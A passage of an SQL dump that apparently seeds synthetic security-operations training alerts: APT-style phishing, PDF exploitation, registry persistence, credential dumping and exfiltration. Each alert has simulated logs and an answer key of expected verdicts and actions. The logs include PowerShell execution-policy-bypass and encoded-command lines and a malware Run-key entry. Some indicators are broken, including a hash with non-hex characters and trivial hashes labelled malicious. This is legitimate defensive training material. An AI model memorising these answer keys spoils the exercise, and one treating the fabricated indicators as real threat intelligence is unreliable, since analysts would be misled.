activities.\"}},{\"id\":\"artifact_2\",\"type\":\"email\",\"value\":\"john.doe@maliciousdomain.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Email Reputation Service\",\"verdict\":\"malicious\",\"details\":\"Email used in multiple phishing campaigns.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"suspicious\",\"details\":\"Hash matches known malicious document.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"Invoice_2023.docx\",\"is_critical\":false,\"osint_result\":{\"source\":\"File Analysis Service\",\"verdict\":\"suspicious\",\"details\":\"Filename commonly used in phishing 
attempts.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'intermediate', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Suspicious Email Phishing Campaign Detected\",\"date\":\"2026-02-01T20:32:22.767Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(1067, 'Remote Code Execution via Malicious PDF', 'high', 'Endpoint detection and response (EDR) logs', 'An unsuspecting employee opened a PDF attachment, triggering a hidden script that executed malware, establishing a foothold for APT1. The PDF was designed to exploit a vulnerability in the PDF reader, allowing remote code execution.', 'Execution', 'T1203 - Exploitation for Client Execution', 1, 'new', NULL, '{\"timestamp\":\"2023-09-15T14:25:36Z\",\"host_ip\":\"192.168.1.45\",\"user\":\"jdoe\",\"filename\":\"Quarterly_Report_Q3_2023.pdf\",\"hash\":\"3a5f5d4c77b4e5a5e8d3c3e28f6a5b0d\",\"process\":\"pdfreader.exe\",\"action\":\"execute\",\"remote_ip\":\"203.0.113.45\",\"malware_name\":\"APT1_Payload\",\"indicators\":{\"external_ip\":\"203.0.113.45\",\"file_hash\":\"3a5f5d4c77b4e5a5e8d3c3e28f6a5b0d\"}}', '2026-01-24 03:35:49', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT1 activity.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"3a5f5d4c77b4e5a5e8d3c3e28f6a5b0d\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash associated with APT1 malware payload.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"Quarterly_Report_Q3_2023.pdf\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"suspicious\",\"details\":\"Filename used in multiple phishing campaigns.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'intermediate', 'MAL', 1, 0, NULL, NULL, NULL, 
'{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1068, 'Persistence Achieved Through Registry Modification', 'high', 'Registry audit logs', 'APT1 has modified registry settings to ensure their malware persists through system reboots. This action was detected based on unusual registry key changes associated with persistence techniques.', 'Persistence', 'T1547.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T13:45:00Z\",\"event_id\":4657,\"computer_name\":\"compromised-host.local\",\"user\":\"malicious_user\",\"registry_key_path\":\"HKEY_LOCAL_MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\"registry_key_value\":\"MaliciousProgram\",\"registry_key_data\":\"C:\\\\Users\\\\malicious_user\\\\AppData\\\\Local\\\\Temp\\\\malware.exe\",\"source_ip\":\"203.0.113.45\",\"internal_ip\":\"192.168.1.105\",\"hash\":\"3a7bd3b6f9c3c5e2d2c8f5b6a7c9e1f2\",\"user_sid\":\"S-1-5-21-3141592653-589793238-462643383\"}', '2026-01-24 03:35:49', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with APT1 activities.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.105\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of compromised host.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"3a7bd3b6f9c3c5e2d2c8f5b6a7c9e1f2\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known APT1 malware sample.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"malicious_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Audit\",\"verdict\":\"suspicious\",\"details\":\"User involved in unauthorized registry 
modifications.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.770Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T13:45:00Z\\\",\\\"event_id\\\":4657,\\\"computer_name\\\":\\\"compromised-host.local\\\",\\\"user\\\":\\\"malicious_user\\\",\\\"registry_key_path\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\\\\",\\\"registry_key_value\\\":\\\"MaliciousProgram\\\",\\\"registry_key_data\\\":\\\"C:\\\\\\\\Users\\\\\\\\malicious_user\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\malware.exe\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.105\\\",\\\"hash\\\":\\\"3a7bd3b6f9c3c5e2d2c8f5b6a7c9e1f2\\\",\\\"user_sid\\\":\\\"S-1-5-21-3141592653-589793238-462643383\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.770Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T13:45:00Z\\\",\\\"event_id\\\":4657,\\\"computer_name\\\":\\\"compromised-host.local\\\",\\\"user\\\":\\\"malicious_user\\\",\\\"registry_key_path\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\\\\",\\\"registry_key_value\\\":\\\"MaliciousProgram\\\",\\\"registry_key_data\\\":\\\"C:\\\\\\\\Users\\\\\\\\malicious_user\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\malware.exe\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.105\\\",\\\"hash\\\":\\\"3a7bd3b6f9c3c5e2d2c8f5b6a7c9e1f2\\\",\\\"user_sid\\\":\\\"S-1-5-21-3141592653-589793238-462643383\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.770Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T13:45:00Z\\\",\\\"event_id\\\":4657,\\\"computer_name\\\":\\\"compromised-host.local\\\",\\\"user\\\":\\\"malicious_user\\\",\\\"registry_key_path\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\\\\",\\\"registry_key_value\\\":\\\"MaliciousProgram\\\",\\\"registry_key_data\\\":\\\"C:\\\\\\\\Users\\\\\\\\malicious_user\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\malware.exe\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.105\\\",\\\"hash\\\":\\\"3a7bd3b6f9c3c5e2d2c8f5b6a7c9e1f2\\\",\\\"user_sid\\\":\\\"S-1-5-21-3141592653-589793238-462643383\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.770Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T13:45:00Z\\\",\\\"event_id\\\":4657,\\\"computer_name\\\":\\\"compromised-host.local\\\",\\\"user\\\":\\\"malicious_user\\\",\\\"registry_key_path\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\\\\",\\\"registry_key_value\\\":\\\"MaliciousProgram\\\",\\\"registry_key_data\\\":\\\"C:\\\\\\\\Users\\\\\\\\malicious_user\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\malware.exe\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.105\\\",\\\"hash\\\":\\\"3a7bd3b6f9c3c5e2d2c8f5b6a7c9e1f2\\\",\\\"user_sid\\\":\\\"S-1-5-21-3141592653-589793238-462643383\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.770Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T13:45:00Z\\\",\\\"event_id\\\":4657,\\\"computer_name\\\":\\\"compromised-host.local\\\",\\\"user\\\":\\\"malicious_user\\\",\\\"registry_key_path\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\\\\",\\\"registry_key_value\\\":\\\"MaliciousProgram\\\",\\\"registry_key_data\\\":\\\"C:\\\\\\\\Users\\\\\\\\malicious_user\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\malware.exe\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.105\\\",\\\"hash\\\":\\\"3a7bd3b6f9c3c5e2d2c8f5b6a7c9e1f2\\\",\\\"user_sid\\\":\\\"S-1-5-21-3141592653-589793238-462643383\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1069, 'Credential Dumping Detected in Lateral Movement', 'high', 'Network traffic analysis', 'APT1 uses harvested credentials to move laterally within the network, searching for systems containing valuable data. Network traffic analysis detected unusual authentication patterns involving known malicious IP addresses and suspicious file transfers.', 'Lateral Movement', 'T1003.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:32:07Z\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"10.0.5.23\",\"action\":\"credential_dumping\",\"user\":\"jdoe\",\"process\":{\"name\":\"lsass.exe\",\"hash\":\"3f6a9d8ec3a7b8e7f5c6d4b9a1e2f3f4\"},\"file\":{\"name\":\"creddump.exe\",\"path\":\"C:\\\\Temp\\\\creddump.exe\"},\"indicators\":{\"malicious_ip\":\"203.0.113.45\",\"malicious_hash\":\"3f6a9d8ec3a7b8e7f5c6d4b9a1e2f3f4\"}}', '2026-01-24 03:35:49', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with APT1 activities.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.5.23\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of compromised host.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"3f6a9d8ec3a7b8e7f5c6d4b9a1e2f3f4\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Malicious hash associated with credential dumping tools.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"creddump.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Detection\",\"verdict\":\"suspicious\",\"details\":\"Suspicious file used for dumping credentials.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal 
Network\",\"verdict\":\"internal\",\"details\":\"Compromised user account involved in the activity.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'intermediate', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1070, 'Data Exfiltration via Encrypted Channels', 'high', 'Outbound network traffic logs', 'In the final phase of their operation, APT1 successfully exfiltrated sensitive intellectual property using encrypted channels to avoid detection. The malicious traffic was identified originating from an internal host and directed towards a known malicious IP address.', 'Exfiltration', 'T1048.003 - Exfiltration Over Unencrypted/Encrypted Non-C2 Protocol', 1, 'new', NULL, '{\"timestamp\":\"2023-10-19T23:45:00Z\",\"src_ip\":\"192.168.15.42\",\"dst_ip\":\"203.0.113.45\",\"protocol\":\"TLS\",\"port\":443,\"bytes_sent\":5242880,\"user\":\"jdoe\",\"file_hash\":\"fa6a1c1d3e4f5g6h7i8j9k0l1m2n3o4p5q6r7s8t9u0v1w2x3y4z5\",\"filename\":\"Q3ResearchResults.pdf\",\"action\":\"allowed\",\"encrypted\":true}', '2026-01-24 03:35:49', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.15.42\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal host involved in data exfiltration.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intel\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with APT1 operations.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"fa6a1c1d3e4f5g6h7i8j9k0l1m2n3o4p5q6r7s8t9u0v1w2x3y4z5\",\"is_critical\":false,\"osint_result\":{\"source\":\"hash_database\",\"verdict\":\"suspicious\",\"details\":\"File hash related to potentially sensitive data.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"Q3ResearchResults.pdf\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_documentation\",\"verdict\":\"clean\",\"details\":\"Internal document containing sensitive research 
data.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_user_directory\",\"verdict\":\"internal\",\"details\":\"User with access to sensitive data.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\",\"escalate\"]}', 'intermediate', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1071, 'Unusual Network Traffic Detected', 'medium', 'Network Intrusion Detection System (NIDS)', 'Initial signs of compromise detected as malware attempts to establish a connection with the GSM infrastructure. The traffic pattern suggests an attempt to gain a foothold in the GSM base station network.', 'Initial Access', 'T1078 - Valid Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T08:23:45Z\",\"source_ip\":\"45.77.123.88\",\"destination_ip\":\"10.0.5.23\",\"alert\":\"Unusual connection attempt to internal GSM network\",\"detected_protocol\":\"TCP\",\"detected_port\":8080,\"malware_hash\":\"5d41402abc4b2a76b9719d911017c592\",\"username\":\"gsm_operator\",\"file_name\":\"gsm_connect.exe\",\"session_id\":\"abc123def456\",\"additional_info\":{\"geo_location\":\"Outside Corporate HQ\",\"previous_connection\":false}}', '2026-01-24 03:35:57', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"45.77.123.88\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"Known IP address associated with previous cyber attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.5.23\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal GSM base station.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known malware targeting GSM networks.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"gsm_operator\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"internal\",\"details\":\"Valid username within the organization.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"gsm_connect.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"File 
Analysis\",\"verdict\":\"malicious\",\"details\":\"Executable associated with malicious activity targeting GSM infrastructure.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1072, 'Suspicious File Execution', 'high', 'Endpoint Detection and Response (EDR)', 'The malware begins executing its components, signaling the start of its multi-stage architecture. A suspicious executable was detected running on the system, which matches known malicious behavior patterns.', 'Execution', 'T1059.001 - Command and Scripting Interpreter: PowerShell', 1, 'new', NULL, '{\"timestamp\":\"2023-10-14T11:35:27Z\",\"event_id\":\"4624\",\"computer_name\":\"DESKTOP-8G1F2KS\",\"user\":\"john.doe\",\"process_name\":\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\",\"command_line\":\"powershell.exe -ExecutionPolicy Bypass -File C:\\\\Users\\\\john.doe\\\\AppData\\\\Local\\\\Temp\\\\malicious_script.ps1\",\"file_hash\":\"b1946ac92492d2347c6235b4d2611184\",\"source_ip\":\"192.168.1.15\",\"destination_ip\":\"203.0.113.50\",\"file_name\":\"malicious_script.ps1\"}', '2026-01-24 03:35:57', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"hash\",\"value\":\"b1946ac92492d2347c6235b4d2611184\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash is associated with known malware.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.50\",\"is_critical\":true,\"osint_result\":{\"source\":\"AlienVault OTX\",\"verdict\":\"malicious\",\"details\":\"IP address is listed as part of a C2 network.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"malicious_script.ps1\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Threat Database\",\"verdict\":\"malicious\",\"details\":\"Filename matches known threat indicator.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'intermediate', 'MAL', 1, 
0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1073, 'Encrypted File System Detected', 'high', 'File Integrity Monitoring (FIM)', 'An encrypted virtual file system was uncovered on the host machine, indicating potential advanced persistence mechanisms deployed by malware. The presence of this encrypted file system suggests attempts to maintain a stealthy presence and evade detection.', 'Persistence', 'T1027 - Obfuscated Files or Information', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:23:45Z\",\"event_id\":\"FIM-20231015-023\",\"source_ip\":\"203.0.113.45\",\"internal_ip\":\"192.168.1.15\",\"username\":\"jdoe\",\"filename\":\"enc_vol.dd\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"event_type\":\"file_creation\",\"filepath\":\"/mnt/vfs/enc_vol.dd\",\"action\":\"created\",\"description\":\"An encrypted volume was detected and created on the host system.\",\"additional_info\":{\"file_size\":\"256MB\",\"encryption\":\"AES-256\"}}', '2026-01-24 03:35:57', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with APT activities.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the affected host.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"suspicious\",\"details\":\"File hash not commonly associated, potential zero-day.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"enc_vol.dd\",\"is_critical\":true,\"osint_result\":{\"source\":\"Endpoint Security Logs\",\"verdict\":\"malicious\",\"details\":\"Encrypted volume used for 
persistence.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.776Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"event_id\\\":\\\"FIM-20231015-023\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.15\\\",\\\"username\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"enc_vol.dd\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"event_type\\\":\\\"file_creation\\\",\\\"filepath\\\":\\\"/mnt/vfs/enc_vol.dd\\\",\\\"action\\\":\\\"created\\\",\\\"description\\\":\\\"An encrypted volume was detected and created on the host system.\\\",\\\"additional_info\\\":{\\\"file_size\\\":\\\"256MB\\\",\\\"encryption\\\":\\\"AES-256\\\"}}\"},{\"timestamp\":\"2026-02-01T20:31:22.776Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"event_id\\\":\\\"FIM-20231015-023\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.15\\\",\\\"username\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"enc_vol.dd\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"event_type\\\":\\\"file_creation\\\",\\\"filepath\\\":\\\"/mnt/vfs/enc_vol.dd\\\",\\\"action\\\":\\\"created\\\",\\\"description\\\":\\\"An encrypted volume was detected and created on the host 
